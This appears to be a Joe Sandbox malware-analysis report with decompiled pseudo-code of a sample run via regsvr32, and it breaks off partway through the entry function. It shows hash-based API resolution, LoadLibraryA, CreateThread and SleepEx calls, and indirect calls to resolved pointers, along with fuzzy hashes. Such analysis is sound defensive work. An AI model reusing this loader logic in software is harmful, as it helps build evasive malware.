                                0x7ffc130eaab1
                                0x7ffc130eaab7
                                0x7ffc130eaacd
                                0x7ffc130eaada
                                0x7ffc130eaaed
                                0x7ffc130eaaf8
                                0x7ffc130eaaf8
                                0x7ffc130eaafe
                                0x7ffc130eab13
                                0x7ffc130eab17
                                0x7ffc130eab25
                                0x7ffc130eab2a
                                0x7ffc130eab2f
                                0x7ffc130eab33
                                0x7ffc130eab37
                                0x7ffc130eab3b
                                0x7ffc130eab42
                                0x7ffc130eab46
                                0x7ffc130eab4a
                                0x7ffc130eab4e
                                0x7ffc130eab53
                                0x7ffc130eab58
                                0x7ffc130eab66
                                0x7ffc130eab68
                                0x7ffc130eab6d
                                0x7ffc130eab76
                                0x7ffc130eab84
                                0x7ffc130eab85
                                0x7ffc130eab87
                                0x7ffc130eab9e
                                0x7ffc130eabae
                                0x7ffc130eabb6
                                0x7ffc130eabbd
                                0x7ffc130eabc0
                                0x7ffc130eabe7
                                0x7ffc130eabe9
                                0x7ffc130eac04
                                0x7ffc130eac06
                                0x7ffc130eac08
                                0x7ffc130eac1b
                                0x7ffc130eac1d
                                0x7ffc130eac25
                                0x7ffc130eac2c
                                0x7ffc130eac33
                                0x7ffc130eac3b
                                0x7ffc130eac48
                                0x7ffc130eac4f
                                0x7ffc130eac4f
                                0x7ffc130eac5f
                                0x7ffc130eac6c
                                0x7ffc130eac7b
                                0x7ffc130eac7f
                                0x7ffc130eac94
                                0x7ffc130eac99
                                0x7ffc130eac9e
                                0x7ffc130eaca9
                                0x7ffc130eacb3
                                0x7ffc130eacb7
                                0x7ffc130eacbb
                                0x7ffc130eacbf
                                0x7ffc130eacf0

                                APIs
                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FFC130EAD58
                                  • Part of subcall function 00007FFC130E9AC0: GetProcessHeap.KERNEL32(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B22
                                  • Part of subcall function 00007FFC130E9AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocateObjectProcessSingleWait
                                • String ID: 8
                                • API String ID: 4287835514-406019892
                                • Opcode ID: 12cc14ebfa886b2053cebe09334349d40362fa275ac25661de06008217750727
                                • Instruction ID: d47ef9f54ede6cd88deb67ca670bec40e913a87a435673d09aef5d168ee4430d
                                • Opcode Fuzzy Hash: 12cc14ebfa886b2053cebe09334349d40362fa275ac25661de06008217750727
                                • Instruction Fuzzy Hash: E3D188736086D48BD721CF14E484BDABBA8F788798F040139DB8957B58DB38EA95CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F84E0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: BoundaryDeleteDescriptorHeapProcess
                                • String ID:
                                • API String ID: 4240333050-0
                                • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction ID: 5f73246556db8f551803a434a2abb52e996455873a44691966bc438cbf73c2a4
                                • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction Fuzzy Hash: B941D272609F9987DB58CB14E5807E9B7A4F784B88F084235DB8D57B44EF38D6A5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E9AC0 Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
				void* _t8;
				void* _t9;

				_a16 = __rbx;
				_a24 = __rbp;
				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
				r8d = r8d - 0x27b3;
				if (_t9 != r8d) goto 0x130e9b07;
				return _t8;
			}





                                0x7ffc130e9ac0
                                0x7ffc130e9ac5
                                0x7ffc130e9ae2
                                0x7ffc130e9ae9
                                0x7ffc130e9af3
                                0x7ffc130e9b06

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction ID: 416bdeb696cee8df0479d703f5e23b7e69f67396b7a46ea3df2999aaeb1c8561
                                • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction Fuzzy Hash: CE118672719B9086EA49CB62E8842AEA3A0F78CBD4F584135DF4D53B49CF38D5A08700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 007340F8 Relevance: 2.6, APIs: 2, Instructions: 131memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: ff14c0a9bc09fa29a53ecb2845c321d3430fdfcfc2135494fb6c344a7bd47fce
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 75518A73A04B90C6E768CF05F844B5AB7B5F784B94F118219EE8953B15DB3CE8A1DB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 007388C8 Relevance: 2.6, APIs: 2, Instructions: 74memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E007388C8(void* __ecx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r10, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				signed int _v40;
				void* _t26;
				void* _t29;
				void* _t33;
				void* _t34;
				long long _t44;
				long long* _t45;
				long long _t59;
				signed char _t62;
				long long* _t65;
				long long _t67;
				long _t73;
				signed char* _t74;
				long _t76;
				intOrPtr _t77;
				void* _t79;

				_t44 = _t67;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x10)) = __rbp;
				 *((long long*)(_t44 + 0x18)) = __rsi;
				 *((long long*)(_t44 + 0x20)) = __rdi;
				_t74 =  *0x73d458;
				_t77 =  *0x73d448;
				_t62 = _t74[8];
				_t26 =  *0x73d450 + 0x128ab5e4;
				_t65 = __rcx;
				r8d = _t26;
				_t33 = _t26;
				HeapAlloc(_t79, _t76, _t73);
				_t59 = _t44;
				if(_t44 == 0) {
					_t34 = 8;
				} else {
					E0073487A();
					_t7 = _t59 + 0x48; // 0x48
					_t29 = E00735FC8(_t33, _t44, __rbx, _t77 + 0x74108a, _t7, _t62, __rcx, __r10); // executed
					_t34 = _t29;
					if(_t29 != 0) {
						L4:
						L0073A568();
					} else {
						_t10 = _t44 + 0x76; // 0x76
						r8d = _t10;
						HeapAlloc(??, ??, ??);
						 *_t59 = _t44;
						if(_t44 != 0) {
							r10d =  *_t74 & 0x000000ff;
							r9d = _t74[1] & 0x000000ff;
							_t45 = _t77 + 0x74134a;
							_v32 = _t45;
							_v40 = r10d;
							L0073B158();
							E0073908C(0x9ffc4c27, _t45, _t74[0x10]);
							if(_t45 != 0) {
								 *_t45();
							}
							 *_t65 = _t59;
						} else {
							_t11 = _t44 + 8; // 0x8
							_t34 = _t11;
							goto L4;
						}
					}
				}
				return _t34;
			}




















                                0x007388c8
                                0x007388cb
                                0x007388cf
                                0x007388d3
                                0x007388d7
                                0x007388e5
                                0x007388f2
                                0x007388f9
                                0x007388fe
                                0x00738903
                                0x00738909
                                0x0073890e
                                0x00738910
                                0x00738916
                                0x0073891c
                                0x007389c3
                                0x00738922
                                0x0073892a
                                0x00738936
                                0x00738942
                                0x00738947
                                0x0073894b
                                0x0073896a
                                0x0073896d
                                0x0073894d
                                0x0073894d
                                0x0073894d
                                0x00738956
                                0x0073895f
                                0x00738965
                                0x00738974
                                0x00738979
                                0x0073897f
                                0x00738987
                                0x00738999
                                0x0073899e
                                0x007389ad
                                0x007389b5
                                0x007389bb
                                0x007389bb
                                0x007389bd
                                0x00738967
                                0x00738967
                                0x00738967
                                0x00000000
                                0x00738967
                                0x00738965
                                0x0073894b
                                0x007389e8

                                APIs
                                • HeapAlloc.KERNEL32 ref: 00738910
                                  • Part of subcall function 00735FC8: LoadLibraryA.KERNELBASE(?,?,00000000,00738947,?,?,?,?,?,00739D9C), ref: 00735FFF
                                • HeapAlloc.KERNEL32 ref: 00738956
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocHeap$LibraryLoad
                                • String ID:
                                • API String ID: 2795448893-0
                                • Opcode ID: 10939a00a673c1b2798b5a6ccdd22f3f94c6d54117059e512df150fb06bdf205
                                • Instruction ID: 919ec116e62b4d938bcc9551d4dec6a0de377f6628a36007cf8e79d46af8f2ea
                                • Opcode Fuzzy Hash: 10939a00a673c1b2798b5a6ccdd22f3f94c6d54117059e512df150fb06bdf205
                                • Instruction Fuzzy Hash: C021A032704B91C2FB04DB12E8547AA77A5F788B80F894426EE8C83B16EF3CE555C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FE7E0 Relevance: 1.6, APIs: 1, Instructions: 132fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E00007FFC7FFC130FE7E0(long long __rcx, void* __rdx, void* __r8, void* __r9, long long _a8, long long _a24, long long _a56, intOrPtr _a64, long long _a80, long long _a120) {
				long long _t35;
				long long _t36;
				intOrPtr _t43;
				long long _t51;

				_t51 = __rcx + 0x18b7;
				_a80 = _a80 + 0x18b7;
				_a120 = _t35;
				_a24 = _t51;
				_a8 = __rdx - 0xefd;
				_a56 = __rcx;
				r13d = __r9 - 0x2598;
				if (_t51 - _t35 < 0) goto 0x130fe91e;
				_t36 = _a120 + 0xffffffffffffe94b;
				if (_t51 - _t36 < 0) goto 0x130fe8da;
				_t43 = _a64;
				dil = dil +  *0xE8CB8B478B493187;
				asm("sbb dword [eax+0x3], 0x0");
				 *0xE8CB8B480000593B =  *((intOrPtr*)(0xe8cb8b480000593b)) + dil;
				 *((long long*)(_t43 + 0x158)) = _t36;
				E00007FFC7FFC130EA280(); // executed
				 *((intOrPtr*)(_t43 + 0x78)) =  *((intOrPtr*)(_t43 + 0x78)) + ( *(_t43 + 0xc8) ^ 0x00002032);
				 *((long long*)(_t43 + 0xd0)) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x88)) + 0x3c)) +  *((intOrPtr*)(_t43 + 0x88));
				return __r9 + 0xffd;
			}







                                0x7ffc130fe7f5
                                0x7ffc130fe809
                                0x7ffc130fe81a
                                0x7ffc130fe82f
                                0x7ffc130fe83c
                                0x7ffc130fe849
                                0x7ffc130fe850
                                0x7ffc130fe859
                                0x7ffc130fe85f
                                0x7ffc130fe867
                                0x7ffc130fe869
                                0x7ffc130fe87a
                                0x7ffc130fe880
                                0x7ffc130fe884
                                0x7ffc130fe88d
                                0x7ffc130fe894
                                0x7ffc130fe8a6
                                0x7ffc130fe8b8
                                0x7ffc130fe8d9

                                APIs
                                • UnlockFile.KERNEL32 ref: 00007FFC130FE973
                                  • Part of subcall function 00007FFC130EA280: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA2BF
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHeapProcessUnlock
                                • String ID:
                                • API String ID: 4174814671-0
                                • Opcode ID: 0f6aff73a541932ebd0fa008593d87825097b8f1cc23029558f05c9c3baadb60
                                • Instruction ID: 6360f9256526b0d0a89c9a67fcd72b571c178a27c857894379517e9878f73262
                                • Opcode Fuzzy Hash: 0f6aff73a541932ebd0fa008593d87825097b8f1cc23029558f05c9c3baadb60
                                • Instruction Fuzzy Hash: 4A6168736096858BE3A1DF05E8817DAB7A8F788798F10413ACA8D57B54CB38E568CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00735FC8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 29%
                                			E00735FC8(void* __ebx, long long* __rax, long long __rbx, long long* __rcx, long long* __rdx, long long __rsi, long long __rbp, void* __r10, long long _a8, long long _a16, void* _a24, long long _a32) {
				void* _t16;
				void* _t25;
				long long* _t29;
				long long _t39;
				long long* _t47;
				void* _t52;
				void* _t53;

				_t53 = __r10;
				_t29 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				_t44 =  *0x73d458;
				_t31 = __rcx;
				_t47 = __rdx;
				E0073908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x73d458 + 0x18)));
				if(_t29 != 0) {
					LoadLibraryA(); // executed
					_t31 = _t29;
				}
				if(_t31 == 0) {
					E0073908C(0xc06f8334, _t29,  *((intOrPtr*)(_t44 + 0x18)));
					if(_t29 == 0) {
						_t25 = 0x7f;
					} else {
						_t25 =  *_t29();
					}
				} else {
					_t16 = E007340F8(_t31,  &_a24, _t52, _t53); // executed
					_t25 = _t16;
					if(_t16 != 0) {
						E0073908C(0xc8e2960c, _t29,  *((intOrPtr*)(_t44 + 0x18)));
						if(_t29 != 0) {
							 *_t29();
						}
					} else {
						_t39 = _a24;
						 *_t39 = _t31;
						 *_t47 = _t39;
					}
				}
				return _t25;
			}










                                0x00735fc8
                                0x00735fc8
                                0x00735fc8
                                0x00735fcd
                                0x00735fd2
                                0x00735fdc
                                0x00735fe3
                                0x00735fe6
                                0x00735ff2
                                0x00735ffa
                                0x00735fff
                                0x00736001
                                0x00736001
                                0x0073600b
                                0x00736051
                                0x00736059
                                0x00736061
                                0x0073605b
                                0x0073605d
                                0x0073605d
                                0x0073600d
                                0x00736015
                                0x0073601a
                                0x0073601e
                                0x00736037
                                0x0073603f
                                0x00736044
                                0x00736044
                                0x00736020
                                0x00736020
                                0x00736025
                                0x00736028
                                0x00736028
                                0x0073601e
                                0x0073607c

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00738947,?,?,?,?,?,00739D9C), ref: 00735FFF
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: c84463f0074221fff784c26fd677b7bd062359ddf5a27261c8178ee9b6cd097e
                                • Instruction ID: af08b2bca1fb9cc52cb8ae50ff4c99192b1a1b2501fd761363117e739fc718b0
                                • Opcode Fuzzy Hash: c84463f0074221fff784c26fd677b7bd062359ddf5a27261c8178ee9b6cd097e
                                • Instruction Fuzzy Hash: C9117322719741D6FE189B52B5416296261EBCCBC0F1C8431AF8E4770BDF3DD9518721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F3AC0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E00007FFC7FFC130F3AC0(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				long long _t34;
				long long _t35;
				long long _t36;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (0 != 0) goto 0x130f3afd;
				E00007FFC7FFC130EE6A0(0);
				asm("stosb");
				asm("invalid");
				goto 0x130f3b61;
				 *0x87E8188948FB8B51();
				_v24 = 0x9;
				_t34 =  *0x13124d70; // 0x40
				if (__rcx - _t34 < 0) goto 0x130f3b55;
				if ( *((intOrPtr*)(0x13124970 + __rdi * 8)) == 0x9) goto 0x130f3b29;
				goto 0x130f3b4b; // executed
				E00007FFC7FFC130F39D8( *((intOrPtr*)(0x13124970 + __rdi * 8)) - 0x9, _t34, 0x9, 0x7, __rdx, __rcx, __rbp, __r9); // executed
				 *((long long*)(0x13124970 + __rdi * 8)) = _t34;
				if (_t34 != 0) goto 0x130f3b3c;
				goto 0x130f3b55;
				_t35 =  *0x13124d70; // 0x40
				_t36 = _t35 + 0x40;
				 *0x13124d70 = _t36;
				_v24 = __rdi + 1;
				goto 0x130f3b16;
				asm("invalid");
				return _t36;
			}







                                0x7ffc130f3ac0
                                0x7ffc130f3ac5
                                0x7ffc130f3aca
                                0x7ffc130f3ae6
                                0x7ffc130f3ae8
                                0x7ffc130f3af6
                                0x7ffc130f3af7
                                0x7ffc130f3afb
                                0x7ffc130f3b06
                                0x7ffc130f3b0c
                                0x7ffc130f3b10
                                0x7ffc130f3b18
                                0x7ffc130f3b25
                                0x7ffc130f3b27
                                0x7ffc130f3b29
                                0x7ffc130f3b2e
                                0x7ffc130f3b35
                                0x7ffc130f3b3a
                                0x7ffc130f3b3c
                                0x7ffc130f3b42
                                0x7ffc130f3b45
                                0x7ffc130f3b4e
                                0x7ffc130f3b53
                                0x7ffc130f3b5e
                                0x7ffc130f3b76

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction ID: d5a531d1d487517369e4fa3185e46680de255470d44bb0d5db0ef071cacbf287
                                • Opcode Fuzzy Hash: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction Fuzzy Hash: F5114F32A1CEAA83F7109B21A95113973E8BB403B8F5501B5E68D677D6DF2CE820C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073374C Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • CreateThread.KERNELBASE ref: 00733796
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread
                                • String ID:
                                • API String ID: 1689873465-0
                                • Opcode ID: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                                • Instruction ID: ffe6c2df6c388c32b129c7eff3c920060ff54969ca9dbb262577dda7e8426196
                                • Opcode Fuzzy Hash: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                                • Instruction Fuzzy Hash: AD0175B6708750C7EB608F62A48521A7360F388BA4F184A35AF9D43B56CF7CE6628750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE26C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00007FFC7FFC130EE26C(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				void* _t8;

				if (__rcx == 0) goto 0x130ee28b;
				if (0xffffffffffffffe0 - __rdx < 0) goto 0x130ee2ce;
				_t21 =  ==  ? 0x1 : __rcx * __rdx;
				goto 0x130ee2b2;
				E00007FFC7FFC130F1374();
				if (0x1 == 0) goto 0x130ee2ce;
				E00007FFC7FFC130F0F5C(0x1,  ==  ? 0x1 : __rcx * __rdx, _t21);
				if (0x1 == 0) goto 0x130ee2ce;
				 *0x1 =  *0x1 + 0x1; // executed
				if (0x1 == 0) goto 0x130ee29d;
				goto 0x130ee2db;
				_t8 = E00007FFC7FFC130EE6A0(0x1);
				 *0x1 = 0xc;
				return _t8;
			}





                                0x7ffc130ee27b
                                0x7ffc130ee289
                                0x7ffc130ee298
                                0x7ffc130ee29b
                                0x7ffc130ee29d
                                0x7ffc130ee2a4
                                0x7ffc130ee2a9
                                0x7ffc130ee2b0
                                0x7ffc130ee2c5
                                0x7ffc130ee2ca
                                0x7ffc130ee2cc
                                0x7ffc130ee2ce
                                0x7ffc130ee2d3
                                0x7ffc130ee2e0

                                APIs
                                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC130EF1A8,?,?,0000E67021D0EA18,00007FFC130EE6A9,?,?,?,?,00007FFC130EE139,?,?,?), ref: 00007FFC130EE2C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction ID: 9694324d2e43737ca9127306a7431f6886f4d63b6e61b01c09408d5251f2fc59
                                • Opcode Fuzzy Hash: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction Fuzzy Hash: D4F09644B09F2F41FE545FA199103B552D41F89B68F5C5438CD0EB67C6DE1CE8A0C130
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073118C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E0073118C(void* __ecx, long long* __rax, long long __rbx, long long _a8) {
				long _t7;
				long long* _t19;
				intOrPtr _t21;

				_t19 = __rax;
				_a8 = __rbx;
				_t26 =  *0x73d458;
				_t7 = E0073908C(0x38e683e4, __rax,  *((intOrPtr*)( *0x73d458 + 0x18)));
				if(_t19 != 0) {
					_t7 = SleepEx(); // executed
				}
				_t21 =  *0x73d440;
				if(_t21 != 0 &&  *((long long*)(_t21 + 0x20)) != 0) {
					_t7 = E0073908C(0xf2d20ec6, _t19,  *((intOrPtr*)(_t26 + 0x18)));
					if(_t19 != 0) {
						_t7 =  *_t19();
					}
				}
				return _t7;
			}






                                0x0073118c
                                0x0073118c
                                0x00731196
                                0x007311a6
                                0x007311ae
                                0x007311b7
                                0x007311b7
                                0x007311b9
                                0x007311c3
                                0x007311d5
                                0x007311dd
                                0x007311e6
                                0x007311e6
                                0x007311dd
                                0x007311f2

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • SleepEx.KERNEL32 ref: 007311B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLastSleep
                                • String ID:
                                • API String ID: 1458359878-0
                                • Opcode ID: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                                • Instruction ID: e5134dc85f099ff524d44ce089f7e346af9b6e79c729f3e99a97e8f0dc3d833a
                                • Opcode Fuzzy Hash: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                                • Instruction Fuzzy Hash: 09F0546170464582FF249BA2E5453591371EBC8794F5C82169F1C4738ACF7CD9D1C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00736958 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 76%
                                			_entry_(void* __ecx, void* __edx, void* __edi, void* __rcx, void* __rdi, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rbx;
				void* _t5;
				void* _t6;
				void* _t14;
				long long _t15;
				void* _t19;
				void* _t22;

				_t6 = 1;
				if(__edx == 0) {
					E00736CE4(0, _t14, _t15, __rcx, _t19, _t22);
					if( *0x73d458 != 0) {
